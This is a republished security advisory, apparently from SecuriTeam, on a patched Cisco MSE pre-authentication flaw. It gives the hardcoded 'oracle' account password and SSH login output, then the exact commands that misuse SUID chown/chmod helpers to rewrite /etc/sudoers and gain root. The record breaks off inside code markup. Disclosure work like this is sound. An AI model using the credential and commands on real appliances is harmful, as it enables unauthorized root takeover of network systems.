{"id":6280,"date":"2017-01-23T14:08:15","date_gmt":"2017-01-23T22:08:15","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-131\/"},"modified":"2017-01-23T14:08:15","modified_gmt":"2017-01-23T22:08:15","slug":"news-131","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-131\/","title":{"rendered":"SSD Advisory \u2013 Cisco MSE Preauthentication Remote Code Execution"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/createSampledb.sh_-300x191.jpg\"\/><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> Cisco Mobile Services Engine (MSE) is a platform that helps organizations increase visibility into the network, customize location-based mobile services, and strengthen security. The following advisory describes Cisco MSE Pre-Authentication Code Execution (Cisco MSE version 8.0.100.0).<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released Mobility Services Engine patches (November 2015) to address the vulnerabilities, advisory can be found <a href=\"https:\/\/tools.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-20151104-mse-cred\">here<\/a> and <a href=\"https:\/\/tools.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-20151104-privmse\">here<\/a><\/p>\n<p><span id=\"more-2928\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> Cisco MSE is available in both a physical or virtual appliance. The virtual appliance by default runs a network-accessible SSH server. There is an undocumented user account on the system that allows remote shell access using a static password set upon install. Using this bug in combination with a local privilege escalation vulnerability allows a remote user to gain root privileges on the appliance.<\/p>\n<p>There are two configured user accounts on the appliance, the root user and another account named \u201coracle\u201d. Upon install, the root user\u2019s password is set by an administrator, oracle\u2019s account is undocumented. During the installation of the following files:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ecdb378f340223440\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> rpm -ivh &#8211;nodeps   oracle-xmp-part1-11.2.0-1.x86_64.rpm  oracle-xmp-part2-11.2.0-1.x86_64.rpm  oracle-xmp-part3-11.2.0-1.x86_64.rpm  oracle-xmp-part4-11.2.0-1.x86_64.rpm  oracle-xmp-part5-11.2.0-1.x86_64.rpm  oracle-xmp-part6-11.2.0-1.x86_64.rpm  oracle-xmp-part7-11.2.0-1.x86_64.rpm  oracle-xmp-part8-11.2.0-1.x86_64.rpm  oracle-xmp-part9-11.2.0-1.x86_64.rpm<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0028 seconds] -->  <\/p>\n<p>The MSE system, the account &#8220;oracle&#8221; is created and the password is set to <em>\u201cXmlDba123\u201d<\/em>.<\/p>\n<p>We can see in script createSampledb.sh (\/opt\/installers\/dbinstaller\/binaryrpms\/extracted\/utils\/createSampledb.sh) that the password is set.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/createSampledb.sh_.jpg\" data-slb-active=\"1\" data-slb-asset=\"1684663141\" data-slb-internal=\"0\" data-slb-group=\"2928\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/createSampledb.sh_-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" class=\"alignnone size-medium wp-image-2929\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/createSampledb.sh_-300x191.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/createSampledb.sh_.jpg 626w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Using this account, we can now login to the appliance.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ecdb3799990235684\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $ ssh oracle@cisco-mse    oracle@cisco-mse&#8217;s password:    -bash-3.2$ id    uid=440(oracle) gid=201(xmpdba) groups=200(oinstall),201(xmpdba),202(xmpoper)    context=user_u:system_r:unconfined_t:s0    -bash-3.2$<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb3799990235684-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb3799990235684-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb3799990235684-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb3799990235684-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb3799990235684-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb3799990235684-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb3799990235684-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb3799990235684-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb3799990235684-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb3799990235684-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb3799990235684-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ecdb3799990235684-1\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ssh <\/span><span class=\"crayon-v\">oracle<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">cisco<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">mse<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb3799990235684-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb3799990235684-3\"><span class=\"crayon-v\">oracle<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">cisco<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">mse<\/span>&#8216;<span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb3799990235684-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb3799990235684-5\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">id<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb3799990235684-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb3799990235684-7\"><span class=\"crayon-v\">uid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">440<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">oracle<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">201<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xmpdba<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">groups<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">oinstall<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">201<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xmpdba<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">202<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xmpoper<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb3799990235684-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb3799990235684-9\"><span class=\"crayon-v\">context<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">user_u<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">system_r<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">unconfined_t<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">s0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb3799990235684-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb3799990235684-11\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>From here we can escalate our privileges to root by exploiting some handy SUID binaries whose origins can be seen from the post-install log file.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/post-install.jpg\" data-slb-active=\"1\" data-slb-asset=\"1053042049\" data-slb-internal=\"0\" data-slb-group=\"2928\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/post-install-300x43.jpg\" alt=\"\" width=\"300\" height=\"43\" class=\"alignnone size-medium wp-image-2930\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/post-install-300x43.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/post-install.jpg 736w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Having a literal SUID root copy of both chmod and chown accessible on the system allow us to escalate our privileges using a variety of techniques. One example is changing the ownership and mode of the sudoers file in order to give the oracle user passwordless sudo privileges:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ecdb379d857452597\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> -bash-3.2$ ls -al \/opt\/mse\/framework\/bin\/setbackup*    -rwsr-xr-x 1 root nobody 40024 Mar 6 00:27 \/opt\/mse\/framework\/bin\/setbackupmod    -rwsr-xr-x 1 root nobody 45392 Mar 6 00:27 \/opt\/mse\/framework\/bin\/setbackupown    -bash-3.2$ ls -al \/etc\/sudoers    -r&#8211;r&#8212;&#8211; 1 root root 4789 Mar 6 00:27 \/etc\/sudoers    -bash-3.2$ \/opt\/mse\/framework\/bin\/setbackupown oracle \/etc\/sudoers    -bash-3.2$ \/opt\/mse\/framework\/bin\/setbackupmod 644 \/etc\/sudoers    -bash-3.2$ ls -al \/etc\/sudoers    -rw-r&#8211;r&#8211; 1 oracle root 4789 Mar 6 00:27 \/etc\/sudoers    -bash-3.2$ echo &#8220;oracle ALL=(ALL) NOPASSWD:ALL&#8221; &gt;&gt; \/etc\/sudoers    -bash-3.2$ sudo bash    sudo: \/etc\/sudoers is mode 0644, should be 0440    sudo: no valid sudoers sources found, quitting    -bash-3.2$ \/opt\/mse\/framework\/bin\/setbackupown root \/etc\/sudoers    -bash-3.2$ \/opt\/mse\/framework\/bin\/setbackupmod 440 \/etc\/sudoers    -bash-3.2$ sudo bash    bash-3.2# id    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)    context=user_u:system_r:unconfined_t:s0<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ecdb379d857452597-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ecdb379d857452597-37\">37<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-1\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">al<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">opt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mse<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">setbackup*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-3\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rwsr<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">xr<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-i\">nobody<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">40024<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">opt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mse<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">setbackupmod<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-5\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rwsr<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">xr<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-i\">nobody<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">45392<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">opt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mse<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">setbackupown<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-7\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">al<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-9\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">root <\/span><span class=\"crayon-i\">root<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4789<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-11\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">opt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mse<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">setbackupown <\/span><span class=\"crayon-v\">oracle<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-13\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">opt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mse<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">setbackupmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">644<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-15\"><span class=\"crayon-o\">&#8211;<\/span><span 